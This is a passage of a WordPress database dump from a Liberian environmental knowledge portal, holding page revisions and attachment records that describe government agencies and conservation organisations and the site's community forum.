environment, the quality of life and the improvement of economic and social living condition of the citizenry present and future generations. It also seeks to ensure reconciliation and coordination between economic development and growth with the sustainable management of the natural resources. A National Environmental Policy provides a broad framework for the implementation of national objectives and plans.\r\n\r\nThe Environmental Protection and Management Law (EPML) of Liberia establishes a legal framework for the sustainable development, management and protection of the environment by the Environment Protection Agency in partnership with regulatory Ministries and organizations and in a close and responsive relationship with the people of Liberia; and to provide high quality information and advice on the state of the environment and for matters connected therewith. The EMPL have several principles and objectives to include but not limited to the following: The principle of sustainable development; The pre-cautionary principle, The polluter - pays principle, The principle of inter-generational equity, The principle of public participation, The principle of international co-operation in the management of environmental resources shared by two or more states; and Other principles of natural resources and environmental management.\r\n\r\nThe Act creating the Agency provides the legal mandates and authority to manage coordinate, monitor and supervise in consultation with relevant line Ministries, Agencies and organization, and other relevant stakeholders for the protection of the environment and sustainable use of natural resources. The act details the functions of the EPA from the Policy Council to environmental inspectors. The Act also clearly explain the entire environmental impact assessment (EIA) process in its totality.\r\n<h5>Mandate</h5>\r\nThe Agency is mandated to protect the environment and sustainable use of natural resources in consultation with relevant line Ministries, Agencies and organizations, and other relevant stakeholders. EPA ensures that the environment is clean, safe and healthy.\r\n<h2>Featured Projects</h2>\r\n<h2>Related Documents</h2>\r\n[posts_table post_type=\"document\"\r\ncolumns=\"id,title,\r\nexcerpt,cf:download_link,\r\ntax:resource_category:Categories,\r\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:epa\" page_length=\"false\"]','Ministry of Finance and Development Planning','','inherit','closed','closed','','2704-revision-v1','','','2019-11-23 15:57:01','2019-11-23 15:57:01','',2704,'https://ekmsliberia.info/2704-revision-v1/',0,'revision','',0),(2706,1,'2019-11-23 15:58:41','2019-11-23 15:58:41','<p>The Environmental Protection Agency (EPA) is the regulatory Institution of the Government of Liberia for the sustainable management of the environment and its natural resources. The Agency was established by an act of the Legislature November 26, 2002 and published into hand bill on April 30, 2003.</p><p>The EPA operates on three basic legal Instruments: The National Environmental Policy (NEP), The Environmental Management and Protection Law of Liberia and the Act Creating the Environmental Protection Agency. Of these three instruments, the National Environmental Policy ordered the creation of the Environmental Protection Agency to ensure sound environmental management and put in place measure to avoid irreparable damage to the country’s natural resources. The NEP seeks to harmonize cross cutting functions between and amongst agencies. The NEP seeks to ensure long-term economic prosperity of Liberia through sustainable social and economic development of the generation without endangering the potential of future generation. The objective of the NEP is to improve the physical environment, the quality of life and the improvement of economic and social living condition of the citizenry present and future generations. It also seeks to ensure reconciliation and coordination between economic development and growth with the sustainable management of the natural resources. A National Environmental Policy provides a broad framework for the implementation of national objectives and plans.</p><p>The Environmental Protection and Management Law (EPML) of Liberia establishes a legal framework for the sustainable development, management and protection of the environment by the Environment Protection Agency in partnership with regulatory Ministries and organizations and in a close and responsive relationship with the people of Liberia; and to provide high quality information and advice on the state of the environment and for matters connected therewith. The EMPL have several principles and objectives to include but not limited to the following: The principle of sustainable development; The pre-cautionary principle, The polluter - pays principle, The principle of inter-generational equity, The principle of public participation, The principle of international co-operation in the management of environmental resources shared by two or more states; and Other principles of natural resources and environmental management.</p><p>The Act creating the Agency provides the legal mandates and authority to manage coordinate, monitor and supervise in consultation with relevant line Ministries, Agencies and organization, and other relevant stakeholders for the protection of the environment and sustainable use of natural resources. The act details the functions of the EPA from the Policy Council to environmental inspectors. The Act also clearly explain the entire environmental impact assessment (EIA) process in its totality.</p><h5>Mandate</h5><p>The Agency is mandated to protect the environment and sustainable use of natural resources in consultation with relevant line Ministries, Agencies and organizations, and other relevant stakeholders. EPA ensures that the environment is clean, safe and healthy.</p>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:epa\" page_length=\"false\"]','Ministry of Finance and Development Planning','','inherit','closed','closed','','2704-revision-v1','','','2019-11-23 15:58:41','2019-11-23 15:58:41','',2704,'https://ekmsliberia.info/2704-revision-v1/',0,'revision','',0),(2707,1,'2019-11-23 15:59:02','2019-11-23 15:59:02','<p>The Environmental Protection Agency (EPA) is the regulatory Institution of the Government of Liberia for the sustainable management of the environment and its natural resources. The Agency was established by an act of the Legislature November 26, 2002 and published into hand bill on April 30, 2003.</p><p>The EPA operates on three basic legal Instruments: The National Environmental Policy (NEP), The Environmental Management and Protection Law of Liberia and the Act Creating the Environmental Protection Agency. Of these three instruments, the National Environmental Policy ordered the creation of the Environmental Protection Agency to ensure sound environmental management and put in place measure to avoid irreparable damage to the country’s natural resources. The NEP seeks to harmonize cross cutting functions between and amongst agencies. The NEP seeks to ensure long-term economic prosperity of Liberia through sustainable social and economic development of the generation without endangering the potential of future generation. The objective of the NEP is to improve the physical environment, the quality of life and the improvement of economic and social living condition of the citizenry present and future generations. It also seeks to ensure reconciliation and coordination between economic development and growth with the sustainable management of the natural resources. A National Environmental Policy provides a broad framework for the implementation of national objectives and plans.</p><p>The Environmental Protection and Management Law (EPML) of Liberia establishes a legal framework for the sustainable development, management and protection of the environment by the Environment Protection Agency in partnership with regulatory Ministries and organizations and in a close and responsive relationship with the people of Liberia; and to provide high quality information and advice on the state of the environment and for matters connected therewith. The EMPL have several principles and objectives to include but not limited to the following: The principle of sustainable development; The pre-cautionary principle, The polluter - pays principle, The principle of inter-generational equity, The principle of public participation, The principle of international co-operation in the management of environmental resources shared by two or more states; and Other principles of natural resources and environmental management.</p><p>The Act creating the Agency provides the legal mandates and authority to manage coordinate, monitor and supervise in consultation with relevant line Ministries, Agencies and organization, and other relevant stakeholders for the protection of the environment and sustainable use of natural resources. The act details the functions of the EPA from the Policy Council to environmental inspectors. The Act also clearly explain the entire environmental impact assessment (EIA) process in its totality.</p><h5>Mandate</h5><p>The Agency is mandated to protect the environment and sustainable use of natural resources in consultation with relevant line Ministries, Agencies and organizations, and other relevant stakeholders. EPA ensures that the environment is clean, safe and healthy.</p>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:mfdp\" page_length=\"false\"]','Ministry of Finance and Development Planning','','inherit','closed','closed','','2704-revision-v1','','','2019-11-23 15:59:02','2019-11-23 15:59:02','',2704,'https://ekmsliberia.info/2704-revision-v1/',0,'revision','',0),(2708,1,'2019-11-23 15:59:36','2019-11-23 15:59:36','<p>The Ministry of Finance and Development Planning, or MFDP for short, was created in 2013 by an Act of the National Legislature, in line with international financial management best practices. The new MFDP effectively replaces the Ministry of Finance and the Ministry of Planning and Economic Affairs, with the mandate to formulate, institutionalize and administer economic development, fiscal and tax policies for the promotion of sound and efficient management of financial resources of the government.</p><p>As custodian of the country’s economy, the MFDP combines public finance, development planning and economic management expertise and experience to effectively manage the economy.</p>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:mfdp\" page_length=\"false\"]','Ministry of Finance and Development Planning','','inherit','closed','closed','','2704-revision-v1','','','2019-11-23 15:59:36','2019-11-23 15:59:36','',2704,'https://ekmsliberia.info/2704-revision-v1/',0,'revision','',0),(2709,1,'2019-11-23 16:01:55','2019-11-23 16:01:55','','MFDP Sidebar','','publish','closed','closed','','mfdp-sidebar','','','2019-11-23 16:01:55','2019-11-23 16:01:55','',0,'https://ekmsliberia.info/?post_type=sidebar&#038;p=2709',0,'sidebar','',0),(2710,1,'2019-11-23 16:01:47','2019-11-23 16:01:47','','','','publish','closed','closed','','2710','','','2019-11-23 16:01:51','2019-11-23 16:01:51','',2709,'https://ekmsliberia.info/?post_type=condition_group&#038;p=2710',1,'condition_group','',0),(2711,1,'2019-11-23 16:02:59','2019-11-23 16:02:59','','mfdp_logo','','inherit','open','closed','','mfdp_logo','','','2022-09-14 14:30:22','2022-09-14 14:30:22','',2704,'https://ekmsliberia.info/wp-content/uploads/2019/11/mfdp_logo.jpg',0,'attachment','image/jpeg',0),(2714,1,'2019-11-23 17:38:07','2019-11-23 17:38:07','<h2>The EKMS Community Forum</h2>		\n		<p>Like other Social Media sites such as Facebook and Twitter, the EKMS Community Forum is a place where people go to exchange ideas and talk about the growing agenda and/or topics of the Rio Conventions implementation in Liberia.</p><p>Generally, topics opened for discussions are about cross-cutting issues relating to biodiversity, climate change and ways to combat desertification. To explore forum topics <a style=\"color: #3366ff;\" href=\"https://ekms-liberia.mn.co/feed\" target=\"_blank\" rel=\"noopener noreferrer\">Click here</a>.</p><p>The key purpose of the community forum is to provide a vehicle for EKMS Knowledge Brokers to assist you in responding to technical questions or problems that might arise from using the Environmental Knowledge Management System website or issues/questions relating to the Rio Conventions implementation in Liberia.</p><p>Feel free to discuss issues and submit questions or useful links regarding the implementation of the Rio conventions in Liberia. Discussion is by all means restricted to registered users only. <strong>Please note that any inappropriate contents including topics/questions/comments/images/videos posted on the community forum, will be removed by the forum moderators.</strong></p><p>If you are already a member of the EKMS community, please <a style=\"color: #3366ff;\" href=\"https://ekms-liberia.mn.co/sign_in?from=https%3A%2F%2Fekms-liberia.mn.co%2F\" target=\"_blank\" rel=\"noopener noreferrer\">Sign In</a> or <a href=\"https://ekms-liberia.mn.co/?autojoin=1\" target=\"_blank\" rel=\"noopener noreferrer\">Request to Join Us!</a></p><p><strong>Added Tools to the Community:</strong></p><p>Members Chat (Activated)</p><p>Group Chatting (Activated)</p><p>Group online meetings hosting or Video Conferencing (In Progress)</p><p>Events Setup (Activated)</p>','Join the Community','','inherit','closed','closed','','2503-revision-v1','','','2019-11-23 17:38:07','2019-11-23 17:38:07','',2503,'https://ekmsliberia.info/2503-revision-v1/',0,'revision','',0),(2715,1,'2019-11-23 17:50:14','2019-11-23 17:50:14','','featured_epa_page','Photo Credit: EPA','inherit','open','closed','','featured_epa_page','','','2019-11-23 17:50:34','2019-11-23 17:50:34','',1582,'https://ekmsliberia.info/wp-content/uploads/2019/11/featured_epa_page.jpg',0,'attachment','image/jpeg',0),(2716,1,'2019-11-23 17:50:39','2019-11-23 17:50:39','The Environmental Protection Agency (EPA) is the regulatory Institution of the Government of Liberia for the sustainable management of the environment and its natural resources. The Agency was established by an act of the Legislature November 26, 2002 and published into hand bill on April 30, 2003.\r\n\r\nThe EPA operates on three basic legal Instruments: The National Environmental Policy (NEP), The Environmental Management and Protection Law of Liberia and the Act Creating the Environmental Protection Agency. Of these three instruments, the National Environmental Policy ordered the creation of the Environmental Protection Agency to ensure sound environmental management and put in place measure to avoid irreparable damage to the country’s natural resources. The NEP seeks to harmonize cross cutting functions between and amongst agencies. The NEP seeks to ensure long-term economic prosperity of Liberia through sustainable social and economic development of the generation without endangering the potential of future generation. The objective of the NEP is to improve the physical environment, the quality of life and the improvement of economic and social living condition of the citizenry present and future generations. It also seeks to ensure reconciliation and coordination between economic development and growth with the sustainable management of the natural resources. A National Environmental Policy provides a broad framework for the implementation of national objectives and plans.\r\n\r\nThe Environmental Protection and Management Law (EPML) of Liberia establishes a legal framework for the sustainable development, management and protection of the environment by the Environment Protection Agency in partnership with regulatory Ministries and organizations and in a close and responsive relationship with the people of Liberia; and to provide high quality information and advice on the state of the environment and for matters connected therewith. The EMPL have several principles and objectives to include but not limited to the following: The principle of sustainable development; The pre-cautionary principle, The polluter - pays principle, The principle of inter-generational equity, The principle of public participation, The principle of international co-operation in the management of environmental resources shared by two or more states; and Other principles of natural resources and environmental management.\r\n\r\nThe Act creating the Agency provides the legal mandates and authority to manage coordinate, monitor and supervise in consultation with relevant line Ministries, Agencies and organization, and other relevant stakeholders for the protection of the environment and sustainable use of natural resources. The act details the functions of the EPA from the Policy Council to environmental inspectors. The Act also clearly explain the entire environmental impact assessment (EIA) process in its totality.\r\n<h5>Mandate</h5>\r\nThe Agency is mandated to protect the environment and sustainable use of natural resources in consultation with relevant line Ministries, Agencies and organizations, and other relevant stakeholders. EPA ensures that the environment is clean, safe and healthy.\r\n<h2>Featured Projects</h2>\r\n<h2>Related Documents</h2>\r\n[posts_table post_type=\"document\"\r\ncolumns=\"id,title,\r\nexcerpt,cf:download_link,\r\ntax:resource_category:Categories,\r\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:epa\" page_length=\"false\"]','Environmental Protection Agency','','inherit','closed','closed','','1582-revision-v1','','','2019-11-23 17:50:39','2019-11-23 17:50:39','',1582,'https://ekmsliberia.info/1582-revision-v1/',0,'revision','',0),(2717,1,'2019-11-23 17:53:33','2019-11-23 17:53:33','','GEDSC DIGITAL CAMERA','Photo Credit: FDA','inherit','open','closed','','gedsc-digital-camera','','','2019-11-23 17:53:56','2019-11-23 17:53:56','',1586,'https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fda0.jpg',0,'attachment','image/jpeg',0),(2718,1,'2019-11-23 17:54:03','2019-11-23 17:54:03','The Forestry Development Authority (FDA) is mandated to sustainably manage and conserve all forest resources for the benefit of present and future generation. The National Resource Law and recent National Forestry Reform Law are legal instruments that strengthened its mandate and served as guides for the management of forest resources in Liberia.\r\n\r\nIntegrating the 3-Cs approach, FDA works to conserve and sustainably manage forest resources to enable them continue to provision complete range of goods and services for the benefit of all Liberians and also to contribute to the reduction of poverty.\r\n<h2>Featured Projects</h2>\r\n<h2>Related Documents</h2>\r\n[posts_table post_type=\"document\"\r\ncolumns=\"id,title,\r\nexcerpt,cf:download_link,\r\ntax:resource_category:Categories,\r\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:fda\" page_length=\"false\"]','Forestry Development Authority','','inherit','closed','closed','','1586-revision-v1','','','2019-11-23 17:54:03','2019-11-23 17:54:03','',1586,'https://ekmsliberia.info/1586-revision-v1/',0,'revision','',0),(2719,1,'2019-11-23 17:55:44','2019-11-23 17:55:44','','featured_mme','Photo Credit: MME','inherit','open','closed','','featured_mme','','','2019-11-23 17:55:56','2019-11-23 17:55:56','',1608,'https://ekmsliberia.info/wp-content/uploads/2019/11/featured_mme.jpg',0,'attachment','image/jpeg',0),(2720,1,'2019-11-23 17:56:01','2019-11-23 17:56:01','The Ministry functions in the area of policy formulation for the energy, hydrocarbon and water sectors of the Liberia. MME has direct oversight responsibility in the energy sector, and also similar role in developing the water resources of the country.\r\n\r\nThe Institutional Capacity Building and Strengthening of the Water Resources and Energy sectors of Liberia is a contract that is signed and in effect between the Norwegian Water Resources and Energy Directorate (NVE), and the Liberian Ministry of Mines and Energy (MME) to implement an Agreement (Program) between the Governments of Liberia and Norway. This Program is a 5-year (2010 – 2015) program that was signed in 2010.\r\n<h2>Featured Projects</h2>\r\n<a href=\"https://ekmsliberia.info/project-resource/enhancing-resilience-of-vulnerable-coastal-areas/\"><img title=\"Enhancing Resilience of Vulnerable Coastal Areas\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_mme_project.jpg\" sizes=\"(max-width: 1024px) 100vw, 1024px\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_mme_project.jpg 1024w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_mme_project-300x155.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_mme_project-768x398.jpg 768w\" alt=\"Enhancing Resilience of Vulnerable Coastal Areas\" width=\"1024\" height=\"530\" /></a> <a href=\"https://ekmsliberia.info/project-resource/enhancing-resilience-of-vulnerable-coastal-areas/\">Enhancing Resilience of Vulnerable Coastal Areas</a>Coastal areas in Liberia are highly vulnerable to the consequences of climate change. A large proportion of the coastal community...<a href=\"https://ekmsliberia.info/project-resource/enhancing-resilience-of-vulnerable-coastal-areas/\">Read More</a>\r\n<h2>Related Documents</h2>\r\n[posts_table post_type=\"document\"\r\ncolumns=\"id,title,\r\nexcerpt,cf:download_link,\r\ntax:resource_category:Categories,\r\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:mme\" page_length=\"false\"]','Ministry of Mines and Energy','','inherit','closed','closed','','1608-revision-v1','','','2019-11-23 17:56:01','2019-11-23 17:56:01','',1608,'https://ekmsliberia.info/1608-revision-v1/',0,'revision','',0),(2721,1,'2019-11-23 18:02:01','2019-11-23 18:02:01','<h2>Institutions</h2>		\n	<a href=\"https://ekmsliberia.info/institution/environmental-protection-agency/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_epa_page.jpg\" alt=\"Environmental Protection Agency\" width=\"1024\" height=\"530\"></a><a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/environmental-protection-agency/\">Environmental Protection Agency</a></h4>\n	<a href=\"https://ekmsliberia.info/institution/forestry-development-authority/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fda0.jpg\" alt=\"Forestry Development Authority\" width=\"1024\" height=\"530\"></a><a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/forestry-development-authority/\">Forestry Development Authority</a></h4>\n	<a href=\"https://ekmsliberia.info/institution/ministry-of-mines-and-energy/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_mme.jpg\" alt=\"Ministry of Mines and Energy\" width=\"1024\" height=\"530\"></a><a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/ministry-of-mines-and-energy/\">Ministry of Mines and Energy</a></h4>\n	<a href=\"https://ekmsliberia.info/institution/liberia-institute-for-statistics-and-geo-information-services/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_lisgis.jpg\" alt=\"Liberia Institute for Statistics and Geo-Information Services\" width=\"1024\" height=\"530\"></a><a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/liberia-institute-for-statistics-and-geo-information-services/\">Liberia Institute for Statistics and Geo-Information Services</a></h4>\n	<a href=\"https://ekmsliberia.info/institution/water-sanitation-and-hygiene-liberia/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_wash.jpg\" alt=\"Liberia National Water, Sanitation and Hygiene - WASH Commission\" width=\"1024\" height=\"522\"></a><a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/water-sanitation-and-hygiene-liberia/\">Liberia National Water, Sanitation and Hygiene - WASH Commission</a></h4>\n	<a href=\"https://ekmsliberia.info/institution/liberia-land-authority/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/Featured_lla.jpg\" alt=\"Liberia Land Authority\" width=\"1024\" height=\"502\"></a><a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/liberia-land-authority/\">Liberia Land Authority</a></h4>\n	<a href=\"https://ekmsliberia.info/institution/fauna-flora-international/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ffi.png\" alt=\"Fauna &amp; Flora International\" width=\"1024\" height=\"504\"></a><a href=\"https://ekmsliberia.info/institutions-category/international/\">International</a><h4><a href=\"https://ekmsliberia.info/institution/fauna-flora-international/\">Fauna & Flora International</a></h4>\n	<a href=\"https://ekmsliberia.info/institution/conservation-international/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ci.jpg\" alt=\"Conservation International\" width=\"1024\" height=\"523\"></a><a href=\"https://ekmsliberia.info/institutions-category/international/\">International</a><h4><a href=\"https://ekmsliberia.info/institution/conservation-international/\">Conservation International</a></h4>\n	<a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/ministry-of-internal-affairs/\">Ministry of Internal Affairs</a></h4>\n	<a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/liberia-maritime-authority/\">Liberia Maritime Authority</a></h4>\n	<a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/liberia-national-bureau-of-concessions/\">Liberia National Bureau of Concessions</a></h4>\n	<a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/ministry-of-agriculture/\">Ministry of Agriculture</a></h4>\n	<a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/ministry-of-transport/\">Ministry of Transport</a></h4>\n	<a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/liberia-airport-authority/\">Liberia Airport Authority</a></h4>\n	<a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/ministry-of-public-works/\">Ministry of Public Works</a></h4>\n	<a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/central-agricultural-research-institute/\">Central Agricultural Research Institute</a></h4>\n	<a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/national-legislature-on-natural-resource-committee/\">National Legislature on Natural Resource Committee</a></h4>\n	<a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/national-fisheries-aquaculture-authority/\">National Fisheries & Aquaculture Authority</a></h4>\n	<a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/ministry-of-finance-and-development-planning/\">Ministry of Finance and Development Planning</a></h4>\n	<a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/ministry-of-gender-children-and-social-protection/\">Ministry of Gender, Children and Social Protection</a></h4>','Institutions Resources','','inherit','closed','closed','','89-revision-v1','','','2019-11-23 18:02:01','2019-11-23 18:02:01','',89,'https://ekmsliberia.info/89-revision-v1/',0,'revision','',0),(2722,1,'2019-11-23 18:04:45','2019-11-23 18:04:45','','Featured_lla','Photo Credit:  LLA','inherit','open','closed','','featured_lla','','','2019-11-23 18:05:04','2019-11-23 18:05:04','',1602,'https://ekmsliberia.info/wp-content/uploads/2019/11/Featured_lla.jpg',0,'attachment','image/jpeg',0),(2723,1,'2019-11-23 18:05:08','2019-11-23 18:05:08','The Liberia Land Authority (LLA) is a product of the policy, legal and institutional reform of the land sector of Liberia led by the Erstwhile Land Commission. The LLA, established by an Act of the National Legislature on October 6, 2016, as an autonomous agency of the Government with operational independence, subsumes land functions that were performed by several agencies of the Government, including the key land administration agencies - Department of Lands, Survey and Cartography of the former Ministry of Lands, Mines and Energy (MLME), now the Ministry of Mines and Energy, the Deeds and Titles Registry of the Center for National Documents Records Agency (CNDRA), and functions of County Land Commissioners from the Ministry of Internal Affairs.\r\n\r\nThe LLA\'s mandate of the Authority is to develop policies on a continuous basis, undertake actions and implement programs in support of land governance, including land administration and management in Liberia.\r\n<h2>Featured Projects</h2>\r\n<h2>Related Documents</h2>\r\n[posts_table post_type=\"document\"\r\ncolumns=\"id,title,\r\nexcerpt,cf:download_link,\r\ntax:resource_category:Categories,\r\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:lla\" page_length=\"false\"]','Liberia Land Authority','','inherit','closed','closed','','1602-revision-v1','','','2019-11-23 18:05:08','2019-11-23 18:05:08','',1602,'https://ekmsliberia.info/1602-revision-v1/',0,'revision','',0),(2724,1,'2019-11-23 18:13:59','2019-11-23 18:13:59','','featured_wash','','inherit','open','closed','','featured_wash','','','2019-11-23 18:13:59','2019-11-23 18:13:59','',1544,'https://ekmsliberia.info/wp-content/uploads/2019/11/featured_wash.jpg',0,'attachment','image/jpeg',0),(2725,1,'2019-11-23 18:14:31','2019-11-23 18:14:31','LISGIS Serves as the prime, authoritative agency of Government responsible for collecting, managing, coordinating, supervising, evaluating, analyzing, disseminating and setting quality standards for statistical and associated geo-information for overall national socio-economic reconstruction and development; and\r\n\r\nMore specifically, LISGIS formulates and implements national strategies, programs and policies for the development and management of a National Statistical and Geo-Information System and an integrated gender and environment sensitive National Statistical and Spatial Database in Liberia.\r\n<h2>Featured Projects</h2>\r\n<h2>Related Documents</h2>\r\n[posts_table post_type=\"document\"\r\ncolumns=\"id,title,\r\nexcerpt,cf:download_link,\r\ntax:resource_category:Categories,\r\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:lisgis\" page_length=\"false\"]','Liberia Institute for Statistics and Geo-Information Services','','inherit','closed','closed','','1544-revision-v1','','','2019-11-23 18:14:31','2019-11-23 18:14:31','',1544,'https://ekmsliberia.info/1544-revision-v1/',0,'revision','',0),(2726,1,'2019-11-23 18:15:22','2019-11-23 18:15:22','Water, sanitation and hygiene not only improve the quality of life but also bring tangible health, environmental and economic benefits and contribute to poverty reduction. With the current poor access to water, sanitation and good hygiene practices in Liberia, it should be noted that Liberia is losing a notable proportion of its GDP and not financing WASH will contribute to preventing Liberia from reaching its vision of becoming a middle income country by 2030.\r\n\r\nThe Government of Liberia (GoL) has taken the initiative to accelerate the delivery of water, sanitation and hygiene (WASH) services in the country. A coordinated, comprehensive, and well-targeted investment programme to increase safe water coverage and reduce diseases is being implemented. This website brings together all information on the Liberia WASH Sector — stakeholders, events, project information, water point mapping data, and much more. The site is managed by the National Water Sanitation and Hygiene Promotion Committee (NWSHPC).\r\n<h2>Featured Projects</h2>\r\n<h2>Related Documents</h2>\r\n[posts_table post_type=\"document\"\r\ncolumns=\"id,title,\r\nexcerpt,cf:download_link,\r\ntax:resource_category:Categories,\r\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:wash\" page_length=\"false\"]','Liberia National Water, Sanitation and Hygiene - WASH Commission','','inherit','closed','closed','','2457-revision-v1','','','2019-11-23 18:15:22','2019-11-23 18:15:22','',2457,'https://ekmsliberia.info/2457-revision-v1/',0,'revision','',0),(2727,1,'2019-11-23 18:17:03','2019-11-23 18:17:03','','Liberian boy carrying bucket of oil palm fruit.','Liberian boy carrying bucket of oil palm fruit. Photo Credit: CI','inherit','open','closed','','liberian-boy-carrying-bucket-of-oil-palm-fruit','','','2019-11-23 18:17:37','2019-11-23 18:17:37','',1612,'https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ci.jpg',0,'attachment','image/jpeg',0),(2728,1,'2019-11-23 18:17:07','2019-11-23 18:17:07','','featured_ffi','Photo Credit: FFI-Liberia','inherit','open','closed','','featured_ffi','','','2019-11-23 18:18:23','2019-11-23 18:18:23','',1612,'https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ffi.png',0,'attachment','image/png',0),(2729,1,'2019-11-23 18:17:42','2019-11-23 18:17:42','As an affiliate of the global organization, Conservation International-Liberia works closely with communities, private sector, the government and civil society leaders to support nature conservation.\r\n\r\nConservation International works to spotlight and secure the critical benefits that nature provides to humanity. Since its inception, CI have helped to protect more than 6 million square kilometers (2.3 million square miles) of land and sea across more than 70 countries. Currently with offices in 29 countries and 2,000 partners worldwide, CI’s reach is truly global.\r\n\r\nBuilding upon a strong foundation of science, partnership and field demonstration, Conservation International empowers societies to responsibly and sustainably care for nature, our global biodiversity, for the well-being of humanity.\r\n<h2>Featured Projects</h2>\r\n<h2>Related Documents</h2>\r\n[posts_table post_type=\"document\"\r\ncolumns=\"id,title,\r\nexcerpt,cf:download_link,\r\ntax:resource_category:Categories,\r\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:ci\" page_length=\"false\"]','Conservation International','','inherit','closed','closed','','1612-revision-v1','','','2019-11-23 18:17:42','2019-11-23 18:17:42','',1612,'https://ekmsliberia.info/1612-revision-v1/',0,'revision','',0),(2730,1,'2019-11-23 18:18:30','2019-11-23 18:18:30','Fauna &amp; Flora International (FFI) began working in Liberia in 1997 and we played a crucial role, together with our partners, in re-establishing operations in the country’s oldest protected area – Sapo National Park – after years of civil conflict.\r\n\r\nDrawing on this work in Sapo, we have since worked closely with our partners to help identify and prioritise sites for a protected area network across Liberia and establish the foundations for sustainable forest and environmental management.\r\n\r\nWe are also working extensively to improve collaboration between local, national, regional and private stakeholders across various sectors and national boundaries to reduce threats to biodiversity from subsistence pressures, oil palm operations and large-scale mining operations.\r\n\r\nRecognising the value of Liberian forests for carbon storage, biodiversity conservation and community well-being, we are also playing a lead role in the development of REDD+ project sites in the country.\r\n\r\nCommunity involvement in decision making is central to strengthening forest management and governance in a post-conflict Liberia, and we have supported a range of activities to ensure that communities within and surrounding East Nimba Nature Reserve, Wonegizi and Wologizi Proposed Protected Areas, and Sapo National Park are properly supported to engage in protected area management and conservation.\r\n\r\nFFI is also supporting Liberia’s up-and-coming conservationists by helping to build conservation capacity at a national level – something that is currently limited due to a lack of practical and academic training opportunities. FFI is tackling these challenges by developing appropriate infrastructure and training courses, including university-level teaching as well as practical skills training such as biomonitoring, and conservation management skills such as proposal writing and grant management.\r\n<h2>Featured Projects</h2>\r\n<h2>Related Documents</h2>\r\n[posts_table post_type=\"document\"\r\ncolumns=\"id,title,\r\nexcerpt,cf:download_link,\r\ntax:resource_category:Categories,\r\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:ffi\" page_length=\"false\"]','Fauna & Flora International','','inherit','closed','closed','','1614-revision-v1','','','2019-11-23 18:18:30','2019-11-23 18:18:30','',1614,'https://ekmsliberia.info/1614-revision-v1/',0,'revision','',0),(2732,1,'2019-11-24 00:02:40','0000-00-00 00:00:00','','widget_image','','draft','closed','closed','','','','','2019-11-24 00:02:40','2019-11-24 